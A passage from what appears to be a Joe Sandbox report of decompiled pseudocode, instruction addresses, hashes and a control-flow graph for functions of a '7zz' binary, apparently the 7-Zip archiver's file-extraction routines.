																 *((char*)(_t822 - 4)) = 8;
																E00407A18( *(_t822 - 0x54));
																goto L71;
															}
															__eflags =  *((intOrPtr*)(_t810 + 0x5c)) - _t651;
															if( *((intOrPtr*)(_t810 + 0x5c)) == _t651) {
																L58:
																_t627 =  *((intOrPtr*)(_t810 + 0x10));
																__eflags =  *((intOrPtr*)(_t627 + 0x2c)) - _t651;
																if( *((intOrPtr*)(_t627 + 0x2c)) == _t651) {
																	_t628 = 0;
																	__eflags = 0;
																} else {
																	_t628 = _t627 + 0x24;
																}
																L61:
																__eflags =  *((intOrPtr*)(_t810 + 0x5b)) - _t651;
																if( *((intOrPtr*)(_t810 + 0x5b)) == _t651) {
																	L64:
																	_t754 = 0;
																	__eflags = 0;
																	L65:
																	__eflags =  *((intOrPtr*)(_t810 + 0x5a)) - _t651;
																	if( *((intOrPtr*)(_t810 + 0x5a)) == _t651) {
																		L68:
																		_t793 = 0;
																		__eflags = 0;
																		L69:
																		E004098CF( *(_t822 - 0x54), _t793, _t754, _t628); // executed
																		goto L70;
																	}
																	__eflags =  *((intOrPtr*)(_t810 + 0x7c)) - _t651;
																	if( *((intOrPtr*)(_t810 + 0x7c)) == _t651) {
																		goto L68;
																	}
																	_t793 = _t810 + 0x60;
																	goto L69;
																}
																__eflags =  *((intOrPtr*)(_t810 + 0x7d)) - _t651;
																if( *((intOrPtr*)(_t810 + 0x7d)) == _t651) {
																	goto L64;
																}
																_t754 = _t810 + 0x68;
																goto L65;
															}
															__eflags =  *(_t810 + 0x7e) - _t651;
															if( *(_t810 + 0x7e) == _t651) {
																goto L58;
															}
															_t628 = _t810 + 0x70;
															goto L61;
														}
														__eflags =  *((intOrPtr*)(_t822 - 0x1c)) - _t651;
														if( *((intOrPtr*)(_t822 - 0x1c)) == _t651) {
															goto L71;
														}
														E00408635(_t822 - 0x24);
														goto L53;
													}
													 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
													 *((char*)(_t822 - 4)) = 6;
													goto L89;
												}
												__eflags = _t461 == 1;
												if(_t461 == 1) {
													 *(_t822 + 0xc) = _t681 - 1;
												}
												goto L49;
											}
											 *((intOrPtr*)(_t822 - 0x24)) = 0x47a420;
											 *((char*)(_t822 - 4)) = 5;
											goto L89;
										}
										 *(_t810 + 0x7f) = 1;
										 *((intOrPtr*)(_t810 + 0x78)) =  *((intOrPtr*)(_t822 - 0x68));
										goto L32;
									}
									 *((char*)(_t822 - 4)) = 1;
									E0040C20F(_t822 - 0x70);
									goto L145;
								}
								_push(8);
								_t637 = E004079F2();
								__eflags = _t637 - _t651;
								if(_t637 == _t651) {
									_t821 = 0;
									__eflags = 0;
								} else {
									 *(_t637 + 4) = _t651;
									 *_t637 = 0x47aa80;
									_t821 = _t637;
								}
								__eflags = _t821 - _t651;
								if(_t821 != _t651) {
									 *((intOrPtr*)( *_t821 + 4))(_t821);
								}
								 *( *(_t822 + 0x10)) = _t821;
								goto L141;
							}
							__eflags =  *((intOrPtr*)(_t810 + 0x80)) - _t651;
							_t643 = E00408E6D( *((intOrPtr*)(_t810 + 0x80)) - _t651, _t822 - 0x48, _t422 & 0xffffff00 |  *((intOrPtr*)(_t810 + 0x80)) == _t651);
							__eflags = _t643 - _t651;
							if(_t643 == _t651) {
								goto L141;
							}
							goto L17;
						}
						__eflags =  *(_t822 - 0x70) - 0x15;
						if( *(_t822 - 0x70) == 0x15) {
							 *(_t810 + 0x58) = 1;
							 *((intOrPtr*)(_t810 + 0x50)) =  *((intOrPtr*)(_t822 - 0x68));
							 *((intOrPtr*)(_t810 + 0x54)) =  *((intOrPtr*)(_t822 - 0x64));
							goto L13;
						}
						 *((char*)(_t822 - 4)) = 1;
						E0040C20F(_t822 - 0x70);
						goto L113;
					}
					 *((char*)(_t822 - 4)) = 1;
					E0040C20F(_t822 - 0x70);
					_t817 =  *(_t822 + 8);
					goto L114;
				}
				L5:
				_t651 = _t422;
				goto L141;
			}







































































                                                                      0x0041202c
                                                                      0x00412039
                                                                      0x0041203d
                                                                      0x0041203f
                                                                      0x00412042
                                                                      0x00412048
                                                                      0x00412050
                                                                      0x00412053
                                                                      0x00412058
                                                                      0x0041205b
                                                                      0x0041205b
                                                                      0x00412060
                                                                      0x00412066
                                                                      0x00412068
                                                                      0x0041206c
                                                                      0x00412071
                                                                      0x00412074
                                                                      0x00412074
                                                                      0x00412079
                                                                      0x00412084
                                                                      0x00412087
                                                                      0x0041208a
                                                                      0x00412090
                                                                      0x00412096
                                                                      0x0041209c
                                                                      0x0041209f
                                                                      0x004120a2
                                                                      0x004120a5
                                                                      0x004120b0
                                                                      0x004120b1
                                                                      0x004120b5
                                                                      0x004120b8
                                                                      0x004120ba
                                                                      0x004120c1
                                                                      0x004120d6
                                                                      0x004120db
                                                                      0x004120dd
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004120e6
                                                                      0x004120eb
                                                                      0x004120ef
                                                                      0x004120fe
                                                                      0x00412103
                                                                      0x00412106
                                                                      0x00412108
                                                                      0x0041210b
                                                                      0x00412121
                                                                      0x00412125
                                                                      0x0041214f
                                                                      0x00412152
                                                                      0x00412156
                                                                      0x00412161
                                                                      0x00412162
                                                                      0x00412166
                                                                      0x0041216b
                                                                      0x0041216d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412175
                                                                      0x0041217a
                                                                      0x0041217c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412185
                                                                      0x00412187
                                                                      0x004121a4
                                                                      0x004121a4
                                                                      0x004121a7
                                                                      0x00412bd2
                                                                      0x00412bd5
                                                                      0x00412bd7
                                                                      0x00412bd7
                                                                      0x00412bdd
                                                                      0x00412be3
                                                                      0x00412be5
                                                                      0x00412bea
                                                                      0x00412bed
                                                                      0x00412bfd
                                                                      0x00412bfd
                                                                      0x00412bef
                                                                      0x00412bef
                                                                      0x00412bf2
                                                                      0x00412bf5
                                                                      0x00412bf5
                                                                      0x00412c06
                                                                      0x00412c0c
                                                                      0x00412c11
                                                                      0x00412c17
                                                                      0x00412c19
                                                                      0x00412c1c
                                                                      0x00412c21
                                                                      0x00412c21
                                                                      0x00412c27
                                                                      0x00412c37
                                                                      0x00412c3f
                                                                      0x00412c41
                                                                      0x00412c43
                                                                      0x00412c48
                                                                      0x00412c48
                                                                      0x00412c4e
                                                                      0x00412c50
                                                                      0x00412c56
                                                                      0x00412c56
                                                                      0x00412c56
                                                                      0x00412c5a
                                                                      0x00412c5d
                                                                      0x00412c60
                                                                      0x00412c60
                                                                      0x00412c64
                                                                      0x00412c67
                                                                      0x00412c6d
                                                                      0x00412c7c
                                                                      0x00412c81
                                                                      0x00412c8a
                                                                      0x00412c8a
                                                                      0x004121ad
                                                                      0x004121b3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004121b9
                                                                      0x004121bf
                                                                      0x004121f0
                                                                      0x004121f4
                                                                      0x00412203
                                                                      0x0041220b
                                                                      0x0041220d
                                                                      0x0041220f
                                                                      0x00412222
                                                                      0x00412227
                                                                      0x00412235
                                                                      0x00412239
                                                                      0x00412bb4
                                                                      0x00412bb8
                                                                      0x00412bbd
                                                                      0x00412bc2
                                                                      0x00412bc5
                                                                      0x00412bcb
                                                                      0x00000000
                                                                      0x00412bcb
                                                                      0x0041223f
                                                                      0x00412242
                                                                      0x00412245
                                                                      0x00412249
                                                                      0x0041224e
                                                                      0x00412254
                                                                      0x00412258
                                                                      0x00412259
                                                                      0x0041225b
                                                                      0x0041225e
                                                                      0x00412263
                                                                      0x00412265
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412270
                                                                      0x00412274
                                                                      0x00412275
                                                                      0x00412277
                                                                      0x00412278
                                                                      0x0041227d
                                                                      0x0041227f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041228a
                                                                      0x0041228e
                                                                      0x0041228f
                                                                      0x00412291
                                                                      0x00412292
                                                                      0x00412297
                                                                      0x00412299
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004122a2
                                                                      0x004122ac
                                                                      0x004122ad
                                                                      0x004122b1
                                                                      0x004122b6
                                                                      0x004122b8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004122c1
                                                                      0x004122c6
                                                                      0x004122cb
                                                                      0x004122d4
                                                                      0x004122d8
                                                                      0x004122dd
                                                                      0x004122e0
                                                                      0x004122e2
                                                                      0x004122f3
                                                                      0x004122f6
                                                                      0x004122f6
                                                                      0x004122f7
                                                                      0x00412302
                                                                      0x00412308
                                                                      0x0041230a
                                                                      0x0041230d
                                                                      0x0041231b
                                                                      0x0041231b
                                                                      0x0041231d
                                                                      0x0041231d
                                                                      0x00412320
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412335
                                                                      0x0041233a
                                                                      0x0041233c
                                                                      0x0041234e
                                                                      0x00000000
                                                                      0x0041234e
                                                                      0x0041233e
                                                                      0x00412345
                                                                      0x004125c9
                                                                      0x004125cc
                                                                      0x004125d4
                                                                      0x004125d8
                                                                      0x004125dd
                                                                      0x00412b4c
                                                                      0x00412b4f
                                                                      0x00412b55
                                                                      0x00000000
                                                                      0x00412b55
                                                                      0x00412351
                                                                      0x00412356
                                                                      0x0041235d
                                                                      0x00412365
                                                                      0x00412370
                                                                      0x00412375
                                                                      0x00412378
                                                                      0x0041237c
                                                                      0x00412429
                                                                      0x0041242c
                                                                      0x0041242f
                                                                      0x00412433
                                                                      0x00412438
                                                                      0x0041243e
                                                                      0x00412442
                                                                      0x0041247c
                                                                      0x0041247f
                                                                      0x00412925
                                                                      0x00412925
                                                                      0x00412928
                                                                      0x00412b76
                                                                      0x00412b7d
                                                                      0x00412b85
                                                                      0x00412b8d
                                                                      0x00412b93
                                                                      0x00412b9a
                                                                      0x00412b9e
                                                                      0x00412ba6
                                                                      0x00412baa
                                                                      0x00000000
                                                                      0x00412baa
                                                                      0x0041292e
                                                                      0x00412930
                                                                      0x00412935
                                                                      0x00412938
                                                                      0x00412a0e
                                                                      0x00412a0e
                                                                      0x0041293e
                                                                      0x0041293e
                                                                      0x00412941
                                                                      0x00412945
                                                                      0x0041294b
                                                                      0x0041294b
                                                                      0x00412a10
                                                                      0x00412a12
                                                                      0x00412a18
                                                                      0x00412a1b
                                                                      0x00412a20
                                                                      0x00412a20
                                                                      0x00412a2b
                                                                      0x00412a31
                                                                      0x00412a35
                                                                      0x00412a3a
                                                                      0x00412a3e
                                                                      0x00412a47
                                                                      0x00412a4c
                                                                      0x00412a4e
                                                                      0x00412aea
                                                                      0x00412aed
                                                                      0x00412b5c
                                                                      0x00412b63
                                                                      0x00412b6b
                                                                      0x00412b6f
                                                                      0x00412b71
                                                                      0x00000000
                                                                      0x00412b71
                                                                      0x00412aef
                                                                      0x00412b00
                                                                      0x00412b03
                                                                      0x00412b05
                                                                      0x00412b08
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412b0a
                                                                      0x00412b0c
                                                                      0x00412b10
                                                                      0x00412b15
                                                                      0x00412b15
                                                                      0x00412b1b
                                                                      0x00412b23
                                                                      0x00412b29
                                                                      0x00412b34
                                                                      0x00412b38
                                                                      0x00412b40
                                                                      0x00412b44
                                                                      0x00412b49
                                                                      0x00412a54
                                                                      0x00412a60
                                                                      0x00412a65
                                                                      0x00412a6b
                                                                      0x00412a72
                                                                      0x00412a75
                                                                      0x00412a78
                                                                      0x00412a7a
                                                                      0x00412a7c
                                                                      0x00412ab4
                                                                      0x00412ab9
                                                                      0x00412abc
                                                                      0x00412ac0
                                                                      0x00412ac5
                                                                      0x00412ac5
                                                                      0x00412acb
                                                                      0x00412ad3
                                                                      0x00412ad9
                                                                      0x00412ae1
                                                                      0x00412686
                                                                      0x00412689
                                                                      0x00412691
                                                                      0x00412695
                                                                      0x00000000
                                                                      0x00412695
                                                                      0x00412a7e
                                                                      0x00412a83
                                                                      0x00412a86
                                                                      0x00412a8a
                                                                      0x00412a8f
                                                                      0x00412a8f
                                                                      0x00412a95
                                                                      0x00412a9d
                                                                      0x00412aa3
                                                                      0x00412aab
                                                                      0x004129c7
                                                                      0x004129ca
                                                                      0x004129d2
                                                                      0x004129d6
                                                                      0x004129db
                                                                      0x004129db
                                                                      0x00000000
                                                                      0x00412a4e
                                                                      0x00412488
                                                                      0x0041248d
                                                                      0x00412496
                                                                      0x0041249a
                                                                      0x0041249f
                                                                      0x004124a1
                                                                      0x00412918
                                                                      0x0041291b
                                                                      0x0041291f
                                                                      0x00000000
                                                                      0x00412924
                                                                      0x004124aa
                                                                      0x004124aa
                                                                      0x004124ac
                                                                      0x00412503
                                                                      0x00412505
                                                                      0x00412513
                                                                      0x00412532
                                                                      0x00412534
                                                                      0x00412536
                                                                      0x0041257c
                                                                      0x0041257c
                                                                      0x0041257e
                                                                      0x004126a6
                                                                      0x004126a6
                                                                      0x004126ab
                                                                      0x004126ab
                                                                      0x004126ae
                                                                      0x004126b1
                                                                      0x00412761
                                                                      0x00412764
                                                                      0x00412955
                                                                      0x0041295a
                                                                      0x0041295c
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412967
                                                                      0x00412975
                                                                      0x00412979
                                                                      0x00412981
                                                                      0x00412985
                                                                      0x0041298a
                                                                      0x00412994
                                                                      0x00412997
                                                                      0x0041299a
                                                                      0x0041299c
                                                                      0x0041299e
                                                                      0x004129e2
                                                                      0x004129ea
                                                                      0x004129f2
                                                                      0x004129fa
                                                                      0x00412a02
                                                                      0x00412a05
                                                                      0x00000000
                                                                      0x00412a05
                                                                      0x004129a0
                                                                      0x004129a8
                                                                      0x004129b0
                                                                      0x004129b8
                                                                      0x004129c0
                                                                      0x004129c3
                                                                      0x00000000
                                                                      0x004129c3
                                                                      0x00412771
                                                                      0x00412779
                                                                      0x0041277d
                                                                      0x00412782
                                                                      0x00412784
                                                                      0x00412823
                                                                      0x00412828
                                                                      0x0041282a
                                                                      0x00412912
                                                                      0x00000000
                                                                      0x00412917
                                                                      0x00412839
                                                                      0x00412847
                                                                      0x0041284b
                                                                      0x00412853
                                                                      0x00412857
                                                                      0x0041285c
                                                                      0x00412866
                                                                      0x00412869
                                                                      0x0041286c
                                                                      0x0041286e
                                                                      0x00412870
                                                                      0x004128b7
                                                                      0x004128bf
                                                                      0x004128c7
                                                                      0x004128cf
                                                                      0x004128d7
                                                                      0x004128df
                                                                      0x004128e2
                                                                      0x004128e6
                                                                      0x004128e9
                                                                      0x004128f1
                                                                      0x004128f5
                                                                      0x004128fa
                                                                      0x004128fa
                                                                      0x004128ff
                                                                      0x00412902
                                                                      0x00412908
                                                                      0x00000000
                                                                      0x00412908
                                                                      0x00412872
                                                                      0x0041287a
                                                                      0x00412882
                                                                      0x0041288a
                                                                      0x00412892
                                                                      0x0041289a
                                                                      0x0041289d
                                                                      0x004128a1
                                                                      0x004128a4
                                                                      0x004128ac
                                                                      0x004128b0
                                                                      0x00000000
                                                                      0x004128b0
                                                                      0x0041278a
                                                                      0x00412797
                                                                      0x0041279c
                                                                      0x004127a2
                                                                      0x004127a9
                                                                      0x004127ac
                                                                      0x004127af
                                                                      0x004127b1
                                                                      0x004127b3
                                                                      0x004127e9
                                                                      0x004127f1
                                                                      0x004127f9
                                                                      0x00412801
                                                                      0x00412809
                                                                      0x00412811
                                                                      0x00412814
                                                                      0x00000000
                                                                      0x00412814
                                                                      0x004127b5
                                                                      0x004127bd
                                                                      0x004127c5
                                                                      0x004127cd
                                                                      0x004127d5
                                                                      0x004127dd
                                                                      0x004127e0
                                                                      0x00000000
                                                                      0x004127e0
                                                                      0x004126ba
                                                                      0x004126bf
                                                                      0x004126c1
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004126d0
                                                                      0x004126de
                                                                      0x004126e2
                                                                      0x004126ea
                                                                      0x004126ee
                                                                      0x004126f3
                                                                      0x004126fd
                                                                      0x00412700
                                                                      0x00412703
                                                                      0x00412705
                                                                      0x00412707
                                                                      0x00412735
                                                                      0x0041273d
                                                                      0x00412745
                                                                      0x0041274d
                                                                      0x00412755
                                                                      0x00412758
                                                                      0x00000000
                                                                      0x00412758
                                                                      0x00412709
                                                                      0x00412711
                                                                      0x00412719
                                                                      0x00412721
                                                                      0x00412729
                                                                      0x0041272c
                                                                      0x00000000
                                                                      0x0041272c
                                                                      0x00412584
                                                                      0x00412584
                                                                      0x00412585
                                                                      0x0041269f
                                                                      0x00000000
                                                                      0x0041269f
                                                                      0x0041258b
                                                                      0x0041258b
                                                                      0x0041258c
                                                                      0x00412663
                                                                      0x0041266b
                                                                      0x00412673
                                                                      0x0041267b
                                                                      0x00412682
                                                                      0x00000000
                                                                      0x00412682
                                                                      0x00412592
                                                                      0x00412592
                                                                      0x00412593
                                                                      0x00412634
                                                                      0x0041263b
                                                                      0x00412643
                                                                      0x0041264b
                                                                      0x00412653
                                                                      0x0041265a
                                                                      0x00000000
                                                                      0x0041265a
                                                                      0x00412599
                                                                      0x00412599
                                                                      0x0041259a
                                                                      0x00412628
                                                                      0x00000000
                                                                      0x00412628
                                                                      0x004125a0
                                                                      0x004125a3
                                                                      0x004125a4
                                                                      0x004125e7
                                                                      0x004125ef
                                                                      0x004125f7
                                                                      0x004125ff
                                                                      0x00412609
                                                                      0x0041260d
                                                                      0x00412615
                                                                      0x00412619
                                                                      0x0041261e
                                                                      0x00000000
                                                                      0x0041261e
                                                                      0x004125a6
                                                                      0x004125ae
                                                                      0x004125b6
                                                                      0x004125be
                                                                      0x004125c5
                                                                      0x00000000
                                                                      0x004125c5
                                                                      0x0041253b
                                                                      0x00412543
                                                                      0x0041254b
                                                                      0x00412553
                                                                      0x0041255d
                                                                      0x00412561
                                                                      0x00412569
                                                                      0x0041256d
                                                                      0x00412572
                                                                      0x00000000
                                                                      0x00412572
                                                                      0x004124af
                                                                      0x004124b0
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004124b9
                                                                      0x004124c1
                                                                      0x004124c9
                                                                      0x004124d1
                                                                      0x004124d7
                                                                      0x004124db
                                                                      0x004124e3
                                                                      0x004124e7
                                                                      0x00000000
                                                                      0x004124e7
                                                                      0x00412444
                                                                      0x0041244d
                                                                      0x00412452
                                                                      0x00412455
                                                                      0x00412459
                                                                      0x00412459
                                                                      0x00412461
                                                                      0x00412469
                                                                      0x0041246f
                                                                      0x00412473
                                                                      0x00000000
                                                                      0x00412473
                                                                      0x00412382
                                                                      0x00412388
                                                                      0x0041239b
                                                                      0x0041239b
                                                                      0x0041239e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004123a9
                                                                      0x004123ac
                                                                      0x004123af
                                                                      0x004123b2
                                                                      0x004123bc
                                                                      0x004123c1
                                                                      0x004123c5
                                                                      0x004123ca
                                                                      0x004123d0
                                                                      0x0041241c
                                                                      0x0041241f
                                                                      0x00412423
                                                                      0x00000000
                                                                      0x00412428
                                                                      0x004123d2
                                                                      0x004123d5
                                                                      0x004123e1
                                                                      0x004123e1
                                                                      0x004123e4
                                                                      0x004123e7
                                                                      0x004123ee
                                                                      0x004123ee
                                                                      0x004123e9
                                                                      0x004123e9
                                                                      0x004123e9
                                                                      0x004123f0
                                                                      0x004123f0
                                                                      0x004123f3
                                                                      0x004123ff
                                                                      0x004123ff
                                                                      0x004123ff
                                                                      0x00412401
                                                                      0x00412401
                                                                      0x00412404
                                                                      0x00412410
                                                                      0x00412410
                                                                      0x00412410
                                                                      0x00412412
                                                                      0x00412417
                                                                      0x00000000
                                                                      0x00412417
                                                                      0x00412406
                                                                      0x00412409
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041240b
                                                                      0x00000000
                                                                      0x0041240b
                                                                      0x004123f5
                                                                      0x004123f8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004123fa
                                                                      0x00000000
                                                                      0x004123fa
                                                                      0x004123d7
                                                                      0x004123da
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004123dc
                                                                      0x00000000
                                                                      0x004123dc
                                                                      0x0041238a
                                                                      0x0041238d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00412396
                                                                      0x00000000
                                                                      0x00412396
                                                                      0x0041230f
                                                                      0x00412312
                                                                      0x00000000
                                                                      0x00412312
                                                                      0x004122f9
                                                                      0x004122fa
                                                                      0x004122fd
                                                                      0x004122fd
                                                                      0x00000000
                                                                      0x004122fa
                                                                      0x004122e4
                                                                      0x004122e7
                                                                      0x00000000
                                                                      0x004122e7
                                                                      0x0041222c
                                                                      0x00412230
                                                                      0x00000000
                                                                      0x00412230
                                                                      0x00412214
                                                                      0x00412218
                                                                      0x00000000
                                                                      0x00412218
                                                                      0x004121c1
                                                                      0x004121c3
                                                                      0x004121c8
                                                                      0x004121cb
                                                                      0x004121da
                                                                      0x004121da
                                                                      0x004121cd
                                                                      0x004121cd
                                                                      0x004121d0
                                                                      0x004121d6
                                                                      0x004121d6
                                                                      0x004121dc
                                                                      0x004121de
                                                                      0x004121e3
                                                                      0x004121e3
                                                                      0x004121e9
                                                                      0x00000000
                                                                      0x004121e9
                                                                      0x00412189
                                                                      0x00412197
                                                                      0x0041219c
                                                                      0x0041219e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041219e
                                                                      0x00412127
                                                                      0x0041212c
                                                                      0x00412142
                                                                      0x00412146
                                                                      0x0041214c
                                                                      0x00000000
                                                                      0x0041214c
                                                                      0x00412131
                                                                      0x00412135
                                                                      0x00000000
                                                                      0x00412135
                                                                      0x00412110
                                                                      0x00412114
                                                                      0x00412119
                                                                      0x00000000
                                                                      0x00412119
                                                                      0x004120c3
                                                                      0x004120c3
                                                                      0x00000000

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID: ,$59@$can not open output file
                                                                      • API String ID: 3519838083-2797906540
                                                                      • Opcode ID: a83944683b8da85deb860ed7ac8c2a38f00ab0faa09fc1eaa5330bdfff491946
                                                                      • Instruction ID: cf4575037a337767e5e75bbbc8f08648ffbb7fd2cc7ee605cc239c560f10ba1b
                                                                      • Opcode Fuzzy Hash: a83944683b8da85deb860ed7ac8c2a38f00ab0faa09fc1eaa5330bdfff491946
                                                                      • Instruction Fuzzy Hash: 7682CD30D04248EFDF11EFA4DA40ADDBBB0AF54308F14446EE045B7292DB796E58DB6A
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00416922 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 261COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1980 416922-41695d call 46b890 call 404ad0 1985 416963-41696f 1980->1985 1986 416a25-416a93 call 404ad0 call 4039c0 call 403532 call 417172 call 416c31 call 407a18 * 2 1980->1986 1990 416971-416973 1985->1990 1991 416978-41697e 1985->1991 2027 416a95-416a98 call 409d7c 1986->2027 2028 416b09-416b4a call 411c21 call 4192f5 1986->2028 1994 416a02-416a10 call 408604 1990->1994 1995 416980-4169a8 call 401e9a call 4179f7 1991->1995 1996 4169f5-4169f8 1991->1996 2006 416c20-416c2e 1994->2006 2010 416a15-416a20 call 407a18 1995->2010 2011 4169aa-4169ba call 4179e9 1995->2011 1996->1986 1999 4169fa-4169fd 1996->1999 1999->1994 2020 416c12-416c1e call 408604 2010->2020 2011->2010 2019 4169bc-4169d1 call 408e6d 2011->2019 2029 4169d3-4169d9 call 415c6d 2019->2029 2030 4169de-4169f3 call 407a18 2019->2030 2020->2006 2036 416a9d-416a9f 2027->2036 2044 416b68-416b6b 2028->2044 2045 416b4c-416b63 call 407a18 2028->2045 2029->2030 2030->1995 2030->1996 2036->2028 2039 416aa1-416aab GetLastError 2036->2039 2041 416ab2-416b04 call 403532 call 40b0a0 call 401e26 call 407a18 * 3 2039->2041 2042 416aad 2039->2042 2055 416bff-416c0d call 40862d call 408604 2041->2055 2042->2041 2048 416b77 2044->2048 2049 416b6d-416b70 2044->2049 2045->2055 2053 416b79-416b81 2048->2053 2049->2048 2052 416b72-416b75 2049->2052 2052->2053 2056 416b83-416ba6 2053->2056 2057 416bd4-416bda 2053->2057 2055->2020 2071 416bc6-416bd2 call 40c20f 2056->2071 2072 416ba8-416bad 2056->2072 2086 416bdb call 4290c5 2057->2086 2087 416bdb call 4297ca 2057->2087 2062 416bde 2066 416be0-416be4 2062->2066 2084 416be6 call 407cd5 2066->2084 2085 416be6 call 46c55c 2066->2085 2070 416be9-416bfb call 407a18 2070->2055 2071->2066 2073 416bb6-416bc3 call 40c5ad 2072->2073 2074 416baf-416bb4 2072->2074 2073->2071 2074->2071 2074->2073 2084->2070 2085->2070 2086->2062 2087->2062
                                                                      C-Code - Quality: 93%
                                                                      			E00416922(intOrPtr __ecx, signed int __edx, void* __eflags) {
				intOrPtr* _t123;
				void* _t130;
				signed int _t144;
				signed int _t153;
				signed int _t156;
				intOrPtr _t158;
				signed int _t160;
				void* _t162;
				void* _t163;
				signed int _t169;
				signed int _t175;
				signed int _t180;
				signed int _t185;
				intOrPtr _t198;
				intOrPtr* _t208;
				signed int* _t227;
				intOrPtr* _t231;
				signed int* _t234;
				void* _t235;
				signed int _t236;
				void* _t238;

				E0046B890(E00474B3C, _t238);
				_t123 =  *((intOrPtr*)(_t238 + 0x20));
				_t185 = 0;
				 *_t123 = 0;
				 *((intOrPtr*)(_t123 + 4)) = 0;
				_t231 =  *((intOrPtr*)(__ecx));
				 *((intOrPtr*)(_t238 - 0x14)) = __ecx;
				 *(_t238 - 0x1c) = __edx;
				E00404AD0(_t238 - 0x58, 4);
				 *((intOrPtr*)(_t238 - 0x58)) = 0x47ab80;
				_t234 =  *(_t238 + 0x10);
				 *(_t238 - 4) = 0;
				if( *_t234 != 0) {
					L13:
					E00404AD0(_t238 - 0x6c, 4);
					 *((intOrPtr*)(_t238 - 0x6c)) = 0x47a420;
					 *(_t238 - 4) = 2;
					E004039C0(_t238 - 0x34,  &(_t234[4]));
					 *(_t238 - 4) = 3;
					E00403532(_t238 - 0x28, 0x48bb7c);
					 *(_t238 - 4) = 4;
					_t130 = E00417172(_t238 - 0x40,  *((intOrPtr*)(_t238 - 0x14)) + 0x10, __eflags);
					 *(_t238 - 4) = 5;
					E00416C31(_t238 - 0x34, _t238 - 0x28, _t130);
					E00407A18( *((intOrPtr*)(_t238 - 0x40)));
					 *(_t238 - 4) = 3;
					E00407A18( *(_t238 - 0x28));
					__eflags =  *((intOrPtr*)(_t238 - 0x30)) - _t185;
					if( *((intOrPtr*)(_t238 - 0x30)) == _t185) {
						L18:
						asm("sbb eax, eax");
						E00411C21( *((intOrPtr*)(_t238 + 0x18)),  ~( *_t234) &  *(_t238 - 0x1c),  *((intOrPtr*)(_t238 - 0x14)),  *((intOrPtr*)(_t238 + 0x14)), _t234[0], _t234[0], _t234[1], _t238 - 0x34, _t238 - 0x6c,  *((intOrPtr*)(_t238 + 8)),  *((intOrPtr*)(_t238 + 0xc)));
						_t227 =  &(_t234[7]);
						_t144 = E004192F5(_t231, _t227);
						__eflags = _t144 - _t185;
						 *(_t238 + 0x10) = _t144;
						if(_t144 == _t185) {
							__eflags = _t234[0] - _t185;
							if(_t234[0] == _t185) {
								L23:
								__eflags = 0;
							} else {
								__eflags = _t234[1] - _t185;
								if(_t234[1] != _t185) {
									goto L23;
								} else {
									_push(1);
									_pop(0);
								}
							}
							_push( *((intOrPtr*)(_t238 + 0x18)));
							__eflags =  *_t234 - _t185;
							_t198 =  *_t231;
							_push(0);
							if( *_t234 == _t185) {
								_t235 =  *((intOrPtr*)(_t198 + 0x1c))(_t231,  *((intOrPtr*)(_t238 - 0x4c)),  *((intOrPtr*)(_t238 - 0x50)));
							} else {
								_t235 =  *((intOrPtr*)(_t198 + 0x1c))(_t231, _t185, 0xffffffff);
								 *(_t238 - 0x44) = _t185;
								 *(_t238 - 0x42) = _t185;
								 *(_t238 - 4) = 0xa;
								_t156 =  *((intOrPtr*)( *_t231 + 0x20))(_t231, 0x2c, _t238 - 0x44);
								__eflags = _t156;
								if(_t156 == 0) {
									__eflags =  *(_t238 - 0x44) - 0x15;
									if( *(_t238 - 0x44) == 0x15) {
										L28:
										_t158 = E0040C5AD(_t238 - 0x44);
										_t208 =  *((intOrPtr*)(_t238 + 0x20));
										 *_t208 = _t158;
										 *(_t208 + 4) = _t227;
									} else {
										__eflags =  *(_t238 - 0x44) - 0x13;
										if( *(_t238 - 0x44) == 0x13) {
											goto L28;
										}
									}
								}
								 *(_t238 - 4) = 3;
								E0040C20F(_t238 - 0x44);
							}
							_t236 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x14)))) + 0x30))(_t235);
